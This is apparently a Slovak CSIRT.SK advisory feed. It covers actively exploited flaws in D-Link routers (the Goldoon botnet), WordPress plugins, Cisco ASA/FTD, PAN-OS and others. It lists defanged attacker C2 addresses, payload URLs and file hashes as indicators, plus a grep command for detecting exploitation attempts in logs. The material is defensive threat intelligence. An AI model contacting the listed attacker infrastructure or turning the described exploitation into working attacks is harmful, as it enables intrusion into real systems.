Bezpečnostní výskumníci z FortiGuard upozornili na aktívnu kampaň botnetu “Goldoon“, ktorá zneužíva zraniteľnosť CVE-2015-2051.

CVE-2015-2051 (CVSS skóre 9,8)

Kritická zraniteľnosť CVE-2015-2051 sa týka routerov D-Link a je aktívne zneužívaná. Táto zraniteľnosť umožňuje vzdialeným útočníkom vykonávať ľubovoľné príkazy prostredníctvom akcie GetDeviceSettings na rozhraní HNAP. Útočníci vytvárajú škodlivé pakety s podvrhnutými HTTP požiadavkami a škodlivými príkazmi, čím kompromitujú zariadenia. Tento útočný paket vyzerá nasledovne:

Zraniteľnosť CVE-2015-2051 umožňuje získať úplnú kontrolu nad napadnutým zariadením. Útočníci využívajú túto zraniteľnosť na načítanie skriptu z adresy “hxxp://94[.]228[.]168[.]60:8080” zo vzdialeného servera, ktorý slúži na stiahnutie ďalšej fázy payloadu. Po stiahnutí a spustení dropperu sa na pozadí stiahne a aktivuje malvér Goldoon, ktorý nadviaže spojenie so serverom C2 a čaká na ďalšie príkazy. Malvér disponuje 27 rôznymi metódami na uskutočnenie útokov DDoS pomocou rôznych protokolov. Po vykonaní sa súbor odstráni aj spoločne so scriptom dropper pre zahladenie všetkých stôp po svojej činnosti. Na základe vykonanej analýzy telemetrických údajov poukazuje FortiGuard na dvojnásobné zvýšenie aktivity botnetu v apríli.

Analýza škodlivého softvéru poukázala na vykonávanie troch hlavných krokov:

Malvér Goldoon najprv inicializuje požadované argumenty na nadviazanie spojenia so svojím riadiacim serverom (C2). Tieto argumenty zahŕňajú použitie “WolfSSL” na šifrovanie prevádzky a nastavenie servera Google DNS (“8.8.8.8”, “8.8.4.4”).
Nastaví automatické spúšťanie pre získanie perzistencie v napadnutom zariadení. Škodlivý softvér Goldoon môže byť spustený rôznymi spôsobmi, vrátane inicializačných súborov, aplikácií pri zavádzaní systému Linux alebo automaticky po prihlásení sa obete do napadnutého zariadenia. Tieto metódy zahŕňajú spustenie pri štarte, formou démona, alebo pri prihlásení sa do systému.
Po inicializácii a nastavení automatického spustenia malvér Goldoon nadviaže trvalé spojenie so serverom C2. Čaká na príkazy zo servera C2, aby spustil súvisiace správanie.

IOCs

C2 server

94[.]228[.]168[.]60

Súbory

66f21251d7f8c58316f149fec104723beb979a1215ad4e788d83f0ee6fd34696
712d9abe8fbdff71642a4d377ef920d66338d73388bfee542f657f2e916e219c
d7367d41d19baa4f1022f8eb47f7ff1e13f583265c7c26ab96d5f716fa0d61ee
fdf6dae772f7003d0b7cdc55e047434dbd089e0dc7664a3fae8ccfd9d10ece8c
aa9e6006bce7d0b4554165dba76e67c4a44d98090c9e6ac9f3dca726f6e9adbf
fc44018b7432d9e6a1e98f723b0402101fa6e7483d098b10133aac142c0a4a0b
e7b78f16d0dfc91b4c7e8fd50fc31eba1eb22ec7030af9bf7c551b6019c79333
0e6eb17664943756cab434af5d94fcd341f154cb36fc6f1ef5eb5cfdce68975f
9af8720766c5f3978718c026c2263801b08634443c93bd67022c56c6ef531ef3
df71219ba6f5835309479b6e3eaca73b187f509b915420656bfe9a9cc32596c2
48130a7c09a5c92e15b3fc0d2e1eb655e0bd8f759e01ba849f7734e32dbc2652
8eb9c1eaecd0dcdd242e1bc8c62a1052915b627abe2de8ce147635fb7da3bfcc
b050a1ff0d205f392195179233493ff5b6f44adc93fe0dba1f78c4fe90ebcc46
ffd2d3888b6b1289e380fa040247db6a4fbd2555db3e01fadd2fe41a0fa2debc
88cea61218bdeea94537b74c67873e75b8ada6d050a30d311569c3118d161c46
115e15fbee077a9e126cc0eb349445df34cc9404245520c702fadc5f75b6f859
b10e47db989e29ace6c23ed15e29f313993f95e5e615711060881dfa84618071
037331ab84a841b9d3cfb6f8797c1695e2dc0a2cdcc3f8f3c794dfaa50bcf0df
5631980fab33525f4de1b47be606cd518403f54fa71b81186f02dbf7e9ed0004
246142a5e3f3d3f84d8b38f98ff6897b03628e06e31016b8fafc9eb8c2b6201d
3123a458a6346fd14c5bd7d41cda6c9c9bdabc786366a9ab3d5e7c00132ff835
45bf2c9c6628d87a3cb85ee78ae3e92a09949185e6da11c41e2df04a53bb1274
c81cfe4d3b98d0b28d3c3e7812beda005279bc6c67821b27571240eba440fa49

Závažnosť zraniteľnosti: Kritická

Možné škody:

Vzdialené vykonávanie kódu
Únik informácií
Narušenie integrity

Odporúčania:

Odporúčame bezodkladnú aktualizáciu firmvéru na najnovšiu verziu.

Škodlivý softvér opísaný v tejto správe je detegovaný a blokovaný programom FortiGuard Antivirus ako:

AGENT.G!tr.dldr ELF/Agent.JL!tr.dldr ELF/Agent.GLN!tr POWERSHELL/Agent.G!tr.dldr W64/Agent.GLN!tr

FortiGate, FortiMail, FortiClient a FortiEDR podporujú službu FortiGuard AntiVirus. Komponent FortiGuard AntiVirus je súčasťou každého z týchto riešení. Zákazníci, ktorí využívajú tieto produkty, sú chránení.

Služba FortiGuard Web Filtering Service blokuje server C2.

FortiGuard Labs poskytuje IPS signatúry proti útokom využívajúcim zraniteľnosť CVE-2015-2051: D-Link.Devices.HNAP.SOAPAction-Header.Command.Execution

Odkazy:

https://thehackernews.com/2024/05/new-goldoon-botnet-targets-d-link.html

https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10282

https://www.fortinet.com/blog/threat-research/new-goldoon-botnet-targeting-d-link-devices

Phishing [Infografika]

Marian Danko — Mon, 06 May 2024 12:02:57 +0000

Pripravili sme si pre Vás infografiku o najbežnejších, aktuálnych útokoch s ktorými sa môžete kedykoľvek stretnúť. Ako ich identifikovať a chrániť sa pred nimi?

Ďalšie kritické zraniteľnosti v doplnkoch WordPress

Marian Danko — Tue, 30 Apr 2024 05:35:03 +0000

Doplnky obľúbenej platformy na tvorbu webových stránok obsahujú kritické zraniteľnosti, ktoré umožňujú Obchádzanie autentifikácie, vzdialené vykonávanie kódu, extrakcii citlivých údajov a získanie administrátorských oprávnení. Bolo zaznamenaných viac ako 5,5 milióna pokusov o aktívne zneužitie zraniteľností.

Zraniteľné systémy:

WP Automatic verzie staršie ako 3.9.2.0
Poll Maker & Voting Plugin Team WP Poll Maker verzie staršie ako 3.4.

Opis činnosti:

CVE-2024-27956 (CVSS skóre 9,9)

Kritická zraniteľnosť CVE-2024-27956 sa nachádza v doplnku WP-Automatic pre WordPress. Chyba sa týka nevhodného spracovania autentifikácie užívateľa v jednom zo súborov doplnku WP-Automatic, ktorú je možné obísť zaslaním špeciálne vytvoreného príkazu pre SQL databázu. Úspešné zneužitie chyby SQL injekcie (SQLi) umožňuje získať neoprávnený prístup, vytvoriť používateľské účty na úrovni administrátora, nahrať škodlivý súbor a tým získať kontrolu nad zraniteľnými stránkami.

Útočníci sa po zneužití snažia vytvoriť perzistenciu svojho prístupu a schovať stopy po napadnutí (webshell, backdoor). Činnosť útočníkov často obsahuje premenovanie zraniteľného súboru WP-Automatic, či inštaláciu dodatočných doplnkov pre možné vykonávanie vzdialených zmien.

Bolo zistených viac ako 5,5 milióna pokusov o aktívne zneužitie zraniteľností CVE-2024-27956, CVE-2024-2876 (Icegram Express), CVE-2024-2417 (User Registration) a CVE-2024-28890 (Forminator).

CVE-2024-32514 (CVSS skóre 9,9)

Zraniteľnosť CVE-2024-32514 v doplnku Poll Maker umožňuje autentifikovanému útočníkovi ľubovoľné nahrávanie súborov bez ich validácie. Potenciálny útočník môže nahrať škodlivý typ súboru bez akejkoľvek kontroly, z ktorého môže následne systém automaticky vykonať škodlivý kód. Pre úspešné zneužitie je potrebný prístup na úrovni používateľa, čo umožňuje vzdialené vykonávanie kódu.

IoC:

Používateľ administrátor s menom začínajúcim na xtw
Zraniteľný súbor “/wp content/plugins/wp automatic/inc/csv.php” premenovaný na (príklad) “/wp content/plugins/wp automatic/inc/csv65f82ab408b3.php”
Existencia súborov s odtlačkom SHA1:
- b0ca85463fe805ffdf809206771719dc571eb052 web.php
- 8e83c42ffd3c5a88b2b2853ff931164ebce1c0f3 index.php

Závažnosť zraniteľnosti: Kritická

Možné škody:

Vzdialené vykonávanie kódu
Únik citlivých informácií
Obchádzanie autentifikácie
Zvyšovanie oprávnení

Odporúčania:

Odporúčame bezodkladnú aktualizáciu doplnku WP-Automatic na najnovšiu verziu, pravidelnú kontrolu používateľských účtov systému WordPress

Pre zmiernenie zraniteľnosti CVE-2024-23514 viac informácii tu.

Odkazy:

https://nvd.nist.gov/vuln/detail/CVE-2024-27956

https://thehackernews.com/2024/04/hackers-exploiting-wp-automatic-plugin.html

https://wpscan.com/blog/new-malware-campaign-targets-wp-automatic-plugin/

https://nvd.nist.gov/vuln/detail/CVE-2024-32514

https://www.recordedfuture.com/vulnerability-database/CVE-2024-32514

https://avd.aquasec.com/nvd/2024/cve-2024-32514/

Aktívne zneužívané zero-day zraniteľnosti Cisco

Marian Danko — Mon, 29 Apr 2024 06:20:31 +0000

Spoločnosť Cisco poukázala na rozsiahlu kampaň pomenovanú ArcaneDoor, v ktorej útočníci zneužívajú dvoch zero-day zraniteľností CVE-2024-20353 a CVE-2024-20359. Úspešné zneužitie umožňuje útočníkom šíriť malvér a zbierať citlivé informácie v cieľovom prostredí. Cisco varovala, že sa jedná o aktívne zneužívané zraniteľnosti na firewalloch Cisco ASA a FTD hackerskou skupinou UAT4356 (alias Storm-1849). Spoločnosť zároveň opravila zraniteľnosť CVE-2024-20358, umožňujúcu injektovanie príkazov v spomínaných zariadeniach.

Zraniteľné systémy:

Cisco Secure Firewall ASA
Cisco Secure Firewall Threat Defense

Opis činnosti:

Hackerská skupina UAT4356 známa pod menom Storm-1849 aktívne zneužíva zero-day zraniteľnosti firewallov/IPS CISCO ASA a FTD v rámci kampane ArcandeDoor. Skupine UAT4356 sa podarilo nasadiť dva backdoory, „Line Runner“ a „Line Dancer“, ktoré použila na infiltráciu do zariadení a sieťovej prevádzky a vykonanie škodlivého kódu.

CVE-2024-20353 (CVSS skóre 8,6)

Zero-day zraniteľnosť CVE-2024-20353 v správe webových serverov a VPN umožňuje neautentifikovanému vzdialenému útočníkovi spôsobiť opätovné načítanie zariadenia, čo môže viesť k odmietnutiu služby (DoS). Úspešné zneužitie si vyžaduje aby útočník odoslal špeciálne vytvorenú http požiadavku na webový server zariadenia.

CVE-2024-20358 a CVE-2024-20359 (CVSS skóre 6,0)

Zraniteľnosti CVE-2024-20358 a CVE-2024-20359 funkcie prednahrania klientov VPN a modulov, umožňujú autentifikovanému lokálnemu útočníkovi vykonať ľubovoľný kód (CVE-2024-20359), resp. ľubovoľné príkazy (CVE-2024-20358) s oprávneniami používateľa root. Chyba CVE-2024-20358 sa týka nesprávnej sanitizácie záložného súboru v čase jeho obnovy a CVE-2024-20359 sa týka nesprávnej validácie súborov pri čítaní z pamäte. Obe zraniteľnosti si vyžadujú administrátorské oprávnenia. Útočník môže zneužiť zraniteľnosti obnovením špeciálne upraveného záložného súboru a skopírovaním vytvoreného súboru do súborového systému disk0.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Odmietnutie služby (DoS)
Ľubovoľné vykonávanie kódu
Únik informácií

Odporúčania:

Bezodkladná aktualizácia na najnovšiu verziu softvéru .

Pre overenie integrity svojich zariadení Cisco ASA alebo FTD môžu zákazníci postupovať podľa návodu.

Odkazy:

https://thehackernews.com/2024/04/state-sponsored-hackers-exploit-two.html

https://www.securityweek.com/cisco-raises-alarm-for-arcanedoor-zero-days-hitting-asa-firewall-platforms/

https://www.wired.com/story/arcanedoor-cyberspies-hacked-cisco-firewalls-to-access-government-networks/

https://nvd.nist.gov/vuln/detail/CVE-2024-20353

https://nvd.nist.gov/vuln/detail/CVE-2024-20359

https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response

Kritická zraniteľnosť v doplnku WordPress

Marian Danko — Tue, 23 Apr 2024 06:43:40 +0000

Zásuvný modul Forminator obľúbenej platformy na tvorbu webových stránok obsahuje jednu kritickú a dve vysoko závažné zraniteľnosti. Chyby umožňujú nahrať a spustiť škodlivý kód na serveri stránky, únik citlivých informácií a odmietnutie služby. Zásuvný modul využíva viac ako 500 000 stránok.

Zraniteľné systémy:

Forminator verzie staršie ako 1.29.3

Opis činnosti:

CVE-2024-28890

Kritická zraniteľnosť CVE-2024-28890 bola zistená v module Forminator a umožňuje vzdialenému útočníkovi nahrať a spustiť škodlivý softvér na serveri stránky. Nedostatočná validácia súborov počas ich nahrávania môže viesť k získaniu citlivých informácií, zmene stránky alebo môže dôjsť k odmietnutiu služby (DoS).

CVE-2024-31077

Zraniteľnosť CVE-2024-31077 je chyba typu SQL injection, ktorá umožňuje vzdialenému útočníkovi s oprávneniami správcu vykonávať ľubovoľné príkazy SQL v databáze stránky. Táto zraniteľnosť môže viesť k neoprávnenému čítaniu, upravovaniu alebo odstráneniu údajov v databáze, čím sa môže poškodiť integrita dostupnosť a dôvernosť stránky.

CVE-2024-31857

Zraniteľnosť CVE-2024-31857 je chyba typu Cross-site scripting (XSS), ktorá umožňuje vzdialenému útočníkovi spustiť ľubovoľný HTML kód a skripty v prehliadači používateľa. Úspešné zneužitie tejto zraniteľnosti umožňuje získať citlivé informácie, ako sú prihlasovacie údaje, alebo vykonať ďalšie útoky z vnútra používateľského prostredia.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Únik citlivých informácií
Ľubovoľné vykonávanie kódu
Odmietnutie služby

Odporúčania:

Bezodkladná aktualizácia zásuvného modelu Forminator na verziu 1.29.3 alebo novšiu.

Odkazy:

https://www.cybersecurity-help.cz/vdb/SB2024041832

https://jvn.jp/en/jp/JVN50132400/

https://www.bleepingcomputer.com/news/security/critical-forminator-plugin-flaw-impacts-over-300k-wordpress-sites/

https://www.cybersecurity-help.cz/vdb/SB2024041833

https://www.cybersecurity-help.cz/vdb/SB2024041834

https://wordpress.org/plugins/forminator/

Aktívne zneužívaná zero-day zraniteľnosť v CrushFTP

Marian Danko — Tue, 23 Apr 2024 06:42:34 +0000

Na aktívne zneužívanú bezpečnostnú chybu poukázal výskumník z Airbus CERT. Zero-day zraniteľnosť umožňuje neautentifikovanému útočníkovi uniknúť z virtuálneho súborového systému (VFS) a sťahovať systémové súbory. Tieto útoky sa údajne najviac zameriavali na subjekty v USA, pričom existuje podozrenie, že mohli byť politicky motivované.

Zraniteľné systémy:

CrushFTP verzie staršie ako 11.1

Opis činnosti:

Simon Garrelou z Airbus CERT objavil a nahlásil závažnú zraniteľnosť v CrushFTP, ktorá umožňuje neautentifikovanému útočníkovi uniknúť z virtuálneho súborového systému (VFS) a sťahovať systémové súbory. Zraniteľnosť bola aktívne zneužívaná. Tieto útoky sa údajne najviac zameriavali na subjekty USA, pričom existuje podozrenie, že mohli byť politicky motivované.

Odporúča sa, aby všetci používatelia CrushFTP verzie 9 okamžite prešli na novšiu verziu. Spoločnosť CrushFTP a Airbus zatiaľ nezverejnili žiadne ďalšie technické podrobnosti o tejto zraniteľnosti.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Únik citlivých informácií

Odporúčania:

Odporúčame bezodkladnú aktualizáciu CrushFTP na verziu 10.7.1 a 11.1.0, viac informácií nájdete tu.

Zákazníci s rozšírenou podporou by mali kontaktovať spoločnosť CrushFTP na získanie aktualizácie.

Odkazy:

https://thehackernews.com/2024/04/critical-update-crushftp-zero-day-flaw.html

https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update

https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-exploited-zero-day-immediately/

Microsoft v rámci Patch Tuesday opravil aktívne zneužívané zraniteľnosti

Marian Danko — Mon, 22 Apr 2024 14:55:12 +0000

Spoločnosť Microsoft vydala v apríli 2024 balík opráv pre operačné systémy Windows opravujúcich 149 zraniteľností, z ktorých 67 umožňuje vzdialené vykonávanie kódu. Dve zraniteľnosti sú typu zero-day a boli zaznamenané ako aktívne zneužívané.

Zraniteľné systémy:

Windows,
Office,
Azure,
.NET Framework,
Visual Studio,
SQL Server,
DNS Server,
Windows Defender,
Bitlocker,
Windows Secure Boot.

Spoločnosť Microsoft opravila v rámci svojho pravidelného balíka aktualizácií Patch Tuesday 149 zraniteľností, z toho sú 3 kritické a 2 zero-day. Najzávažnejšie zraniteľnosti umožňujú eskaláciu oprávnení, vykonávanie kódu, únik informácií, či obchádzanie bezpečnostných prvkov. Zero-day zraniteľnosti CVE-2024-29988 a CVE-2024-26234 sú aktívne zneužívané.

CVE-2024-29988 (CVSS skóre 8,8)

Vysoko závažná zraniteľnosť CVE-2024-29988 umožňuje útočníkom obísť bezpečnostnú funkciu Windows SmartScreen a spustiť špeciálne pripravený škodlivý súbor. Chyba bola aktívne zneužívaná hackerskou skupinou Water Hydra.

CVE-2024-26234 (CVSS skóre 6,7)

Zero day zraniteľnosť CVE-2024-26234 umožňuje falšovanie/predstieranie identity. Bola odhalená vďaka analýze podozrivého ovládača proxy servera, ktorý v skutočnosti slúžil ako zadné vrátka. Škodlivý ovládač bol podpísaný prostredníctvom platného certifikátu Microsoft Windows Hardware Compatibility Publisher (WHCP). Túto chybu nahlásil do Redmondu Christopher Budd zo spoločnosti Sophos.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Eskalácia privilégií
Obídenie bezpečnostných prvkov
Vzdialené vykonávanie kódu
Falšovanie identity

Odporúčania:

Bezodkladné nasadenie aprílového balíka opráv na zraniteľné produkty spoločnosti Microsoft nájdete tu.

Zdroje:

https://nvd.nist.gov/vuln/detail/CVE-2024-29988

https://nvd.nist.gov/vuln/detail/CVE-2024-26234

https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-two-windows-zero-days-exploited-in-malware-attacks/

https://thehackernews.com/2024/04/microsoft-fixes-149-flaws-in-huge-april.html

https://krebsonsecurity.com/2024/04/aprils-patch-tuesday-brings-record-number-of-fixes/

Mesačný prehľad kritických zraniteľností marec 2024

Marian Danko — Sun, 14 Apr 2024 21:47:05 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci marec 2024.

Mesačný prehľad – 03/2024 PDF (264 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Mesačná správa CSIRT.SK – Marec 2024

Marian Danko — Sun, 14 Apr 2024 21:45:23 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci marec 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 03/2024 PDF (1,05 MB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás .

Kritická zraniteľnosť v softvéri Palo Alto PAN-OS

Marian Danko — Sat, 13 Apr 2024 20:45:25 +0000

Spoločnosť Palo Alto Networks vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosti v softvéri PAN-OS. Verzie 10.2, 11.0 a 11.1 vo funkcii GlobalProtect obsahujú zraniteľnosť, ktorá umožňuje vzdialené vykonanie kódu. Zraniteľnosť je možné zneužiť len na firewalloch, na ktorých je zapnutá aspoň jedna z funkcií GlobalProtect Gateway alebo GlobalProtect Portal.

Zraniteľné systémy:

PAN-OS 10.2 vo verzii staršej ako 10.2.0-h3, 10.2.1-h2, 10.2.2-h5, 10.2.3-h13, 10.2.4-h16, 10.2.5-h6, 10.2.6-h3, 10.2.7-h8, 10.2.8-h3, 10.2.9-h1
PAN-OS 11.0 vo verzii staršej ako 11.0.0-h3, 11.0.1-h4, 11.0.2-h4, 11.0.3-h10, 11.0.4-h1
PAN-OS 11.1 vo verzii staršej ako 11.1.0-h3, 11.1.1-h1, 11.1.2-h3
zraniteľnosť je možné zneužiť len na firewalloch, na ktorých je zapnutá aspoň jedna z funkcií GlobalProtect Gateway alebo GlobalProtect Portal (podľa nových informácií zneužitie zraniteľnosti nevyžadovalo zapnutie funkcie telemetrie ako sa pôvodne predpokladalo)
zariadenia Cloud NGFW, Panorama appliances a Prisma Access nie sú touto zraniteľnosťou ovplyvnené

Opis činnosti:

CVE-2024-3400 (CVSS skóre 10.0)

Kritická zraniteľnosť s označením CVE-2024-3400 sa nachádza vo funkcii GlobalProtect, spočíva v nesprávnej neutralizácii špeciálnych prvkov v rámci príkazov a vzdialený neautentifikovaný útočník by ju mohol zneužiť na vykonanie škodlivého kódu. Zraniteľnosť je v súčasnosti aktívne zneužívaná útočníkmi.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Vykonanie škodlivého kódu
Úplné narušenie dôvernosti, integrity a dostupnosti systému

Odporúčania:

Výrobca odporúča bezodkladne aktualizovať zraniteľné systémy. V prípade, že aktualizáciu systémov nie je možné vykonať, odporúčame postupovať podľa pokynov výrobcu:

Blokovať útoky a pokusy o zneužitie zraniteľnosti zapnutím signatúr ID hrozieb: 95187, 95189 a 95191 (len používatelia s aktívnym predplatným služby Threat Prevention).
Aplikovať profil ochrany pred zraniteľnosťou na rozhraniach GlobalProtect podľa návodu.

Vzhľadom na aktívne zneužívanie zraniteľnosti odporúčame dôkladne preveriť prítomnosť dostupných indikátorov kompromitácie (IOC) v logoch sieťových a bezpečnostných prvkov.

Pokusy o zneužitie zraniteľnosti na firewalloch možno preveriť pomocou príkazového riadka PAN-OS CLI zadaním príkazu:

grep pattern “failed to unmarshal session(.\+.\/” mp-log gpsvc.log*

Ak výsledky vyhľadávania medzi časťami „session(“ a „)“ obsahujú namiesto GUID, reťazce obsahujúce systémové cesty alebo shell-ové príkazy, môže sa jednať o aktivitu spojenú s pokusmi o zneužitie zraniteľnosti.

Indikátory kompromitácie (IOC):

SHA256 hashe súborov:

3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac (Update.py)
5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078 (Update.py)
35a5f8ac03b0e3865b3177892420cb34233c55240f452f00f9004e274a85703c (patch)
755f5b8bd67d226f24329dc960f59e11cb5735b930b4ed30b2df77572efb32e8 (policy)
adba167a9df482aa991faaa0e0cde1182fb9acfbb0dc8d19148ce634608bab87 (policy)
c1a0d380bf55070496b9420b970dfc5c2c4ad0a598083b9077493e8b8035f1e9 (policy)
fe07ca449e99827265ca95f9f56ec6543a4c5b712ed50038a9a153199e95a0b7 (policy)
96dbec24ac64e7dd5fef6e2c26214c8fe5be3486d5c92d21d5dcb4f6c4e365b9 (policy)
448fbd7b3389fe2aa421de224d065cea7064de0869a036610e5363c931df5b7c (gost-linux-amd64)
e315907415eb8cfcf3b6a4cd6602b392a3fe8ee0f79a2d51a81a928dbce950f8 (policy(6))
161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6 (reverse-sshx64)

IP adresy:

38.60.218[.]153
38.180.41[.]251
38.180.106[.]167
38.180.128[.]159
38.181.70[.]3
38.207.148[.]123
45.121.51[.]23
64.176.226[.]203
66.235.168[.]222
78.141.232[.]174
110.47.250[.]103
126.227.76[.]24
146.70.192[.]174
144.172.79[.]92
147.45.70[.]100
149.28.194[.]95
149.88.27[.]212
154.223.16[.]34
172.233.228[.]93
173.255.223[.]159
185.108.105[.]110
199.119.206[.]28
203.160.86[.]91

Domény:

edcjn.57fe6f5d9d.ipv6.1433.eu[.]org
nhdata.s3-us-west-2.amazonaws[.]com
srgsd1f.842b727ba4.ipv6.1433.eu[.]org

URL:

hxxp://172.233.228[.]93/patch
hxxp://172.233.228[.]93/policy
hxxp://172.233.228[.]93/vpn_prot.gz
hxxp://172.233.228[.]93/vpn.log
hxxp://172.233.228[.]93/lowdp
hxxps://45.121.51[.]2/abc.txt

Aktualizované 19.04.2024: dostupné aktualizácie, predpoklady zneužitia zraniteľnosti, zoznam zasiahnutých systémov, odporúčania

Odkazy:

https://security.paloaltonetworks.com/CVE-2024-3400

https://unit42.paloaltonetworks.com/cve-2024-3400/

https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/

Zero day zraniteľnosť Google Chrome

Marian Danko — Wed, 10 Apr 2024 11:55:25 +0000

Spoločnosť Google vydala bezpečnostné aktualizácie na opravu jednej zero-day a troch vysoko závažných zraniteľností vo webovom prehliadači Chrome. Zraniteľnosti boli objavené počas hackerskej súťaže Pwn20wn Vancouver 2024.

Zraniteľné systémy:

Google Chrome (Windows/Mac) staršie ako 123.0.6312.105./106/.107, 123.0.6312.105 (Linux)

Opis činnosti:

CVE-2024-3159

Zero day zraniteľnosť CVE-2024-3159 sa nachádza v komponente V8 (nástroj JavaScript) a umožňuje čítať mimo povolené hranice pamäte. Úspešné zneužitie umožňuje vzdialenému útočníkovi získať prístup k citlivým údajom a môže viesť k pádu aplikácie, prostredníctvom poškodenia haldy.

CVE-2024-3156

Vysoko závažná zraniteľnosť CVE-2024-3156 komponentu V8 umožňuje vzdialenému útočníkovi pristupovať mimo povolené hranice pamäte. Chyba sa týka nesprávnej implementácie a úspešné zneužitie je možné prostredníctvom vytvorenia škodlivej HTML stránky. Zraniteľnosť nahlásil Zhenghang Xiao.

CVE-2024-3158

Zraniteľnosť CVE-2024-3158 v module záložiek (Bookmarks) umožňuje použiť dealokované miesto v pamäti prehliadača Chrome. Vďaka nej môže útočník vyvolať poškodenie haldy pomocou škodlivej HTML stránky. Na chybu poukázal undoingfish.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Pád aplikácie
Únik citlivých informácií

Odporúčania:

Bezodkladná aktualizácia Google Chrome pre Windows/Mac aspoň na verziu 123.0.6312.106/.107 a Linux aspoň na verziu 123.0.6312.105 .

Odkazy:

https://www.bleepingcomputer.com/news/security/google-fixes-one-more-chrome-zero-day-exploited-at-pwn2own/

https://securityaffairs.com/161445/hacking/google-chrome-zero-day-pwn2own.html

https://cybersecuritynews.com/chrome-zero-day-exploit-patch/

https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop.html

https://nvd.nist.gov/vuln/detail/CVE-2024-3158

https://nvd.nist.gov/vuln/detail/CVE-2024-3156

Kritická zraniteľnosť v platforme Flowmon

Marian Danko — Wed, 10 Apr 2024 11:54:02 +0000

Spoločnosť Progress vydala bezpečnostné aktualizácie platformy Flowmon pre meranie výkonnosti siete a bezpečnosti. Verzie staršie ako 11.1.14 a 12.3.5 obsahujú kritickú bezpečnostnú zraniteľnosť, ktorá umožňuje vzdialené vykonanie systémových príkazov.

Zraniteľné systémy:

Flowmon vo verz. 12.x staršie ako 12.3.5
Flowmon vo verz. 11.x staršie ako 11.1.14
Všetky verzie Flowmon staršie ako 11.0 (10.x a nižšie) nie sú touto zraniteľnosťou ovplyvnené.

Opis činnosti:

CVE-2024-2389 (CVSS skóre 10)

Kritická zraniteľnosť s označením CVE-2024-2389 umožňuje vzdialenému neautentifikovanému útočníkovi získať prístup k webovému manažmentovému rozhraniu Flowmon a následne prostredníctvom špeciálne vytvoreného API príkazu vykonávať ľubovoľné systémové príkazy bez autentifikácie.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Neoprávnený prístup do systému
Vykonanie škodlivého kódu
Úplné narušenie dôvernosti, integrity a dostupnosti systému

Odporúčania:

Bezodkladne vykonať aktualizáciu zasiahnutých systémov na verzie 12.3.5, 11.1.14 a vyššie.
Aktualizovať všetky zásuvné moduly Flowmon.

Odkazy:

https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability

https://www.cve.org/CVERecord?id=CVE-2024-2389

https://socradar.io/command-injection-flaw-progress-flowmon-cve-2024-2389

Bezpečnostné zraniteľnosti v produktoch Ivanti

Marian Danko — Wed, 10 Apr 2024 11:47:53 +0000

Spoločnosť Ivanti vydala bezpečnostné aktualizácie, ktoré opravujú 4 bezpečnostné zraniteľnosti v produktoch Connect Secure a Policy Secure. Najzávažnejšie zraniteľnosti s označením CVE-2024-21894 a CVE-2024-22053 možno zneužiť na zneprístupnenie služby a vzdialené vykonanie škodlivého kódu.

Zraniteľné systémy:

Connect Secure vo verzii 9.x, 22.x
Policy Secure vo verzii 9.x, 22.x
Kompletnú špecifikáciu zasiahnutých verzií nájdete na stránke výrobcu.

Opis činnosti:

CVE-2024-21894 (CVSS skóre 8,2), CVE-2024-22053 (CVSS skóre 8,2 )

Najzávažnejšie zraniteľnosti vedúce k pretečeniu haldy sa nachádzajú v komponente IPsec a vzdialenému neautentifikovanému útočníkovi umožňujú prostredníctvom zaslania špeciálne vytvorenej požiadavky spôsobiť zneprístupnenie služby, neopravený prístup k obsahu pamäte a za istých podmienok môžu viesť k vykonaniu škodlivého kódu.

CVE-2024-22052 (CVSS skóre 7,5), CVE-2024-22023 (CVSS skóre 5,3)

Zraniteľnosti CVE-2024-22052 a CVE-2024-22023 nachádzajúce sa v komponentoch IPsec a SAML umožňujú vzdialenému neautentifikovanému útočníkovi spôsobiť zneprístupnenie služby.

Závažnosť zraniteľnosti: Vysoko závažná

Možné škody:

Zneprístupnenie služby
Vykonanie škodlivého kódu

Odporúčania:

Bezodkladne vykonať aktualizáciu zasiahnutých systémov na najnovšie verzie špecifikované výrobcom.

Odkazy:

https://forums.ivanti.com/s/article/SA-CVE-2024-21894-Heap-Overflow-CVE-2024-22052-Null-Pointer-Dereference-CVE-2024-22053-Heap-Overflow-and-CVE-2024-22023-XML-entity-expansion-or-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US

https://forums.ivanti.com/s/article/Granular-Software-Release-EOL-Timelines-and-Support-Matrix?language=en_US

Útoky „Brutus“ zamerané na služby VPN

Marian Danko — Mon, 08 Apr 2024 07:11:37 +0000

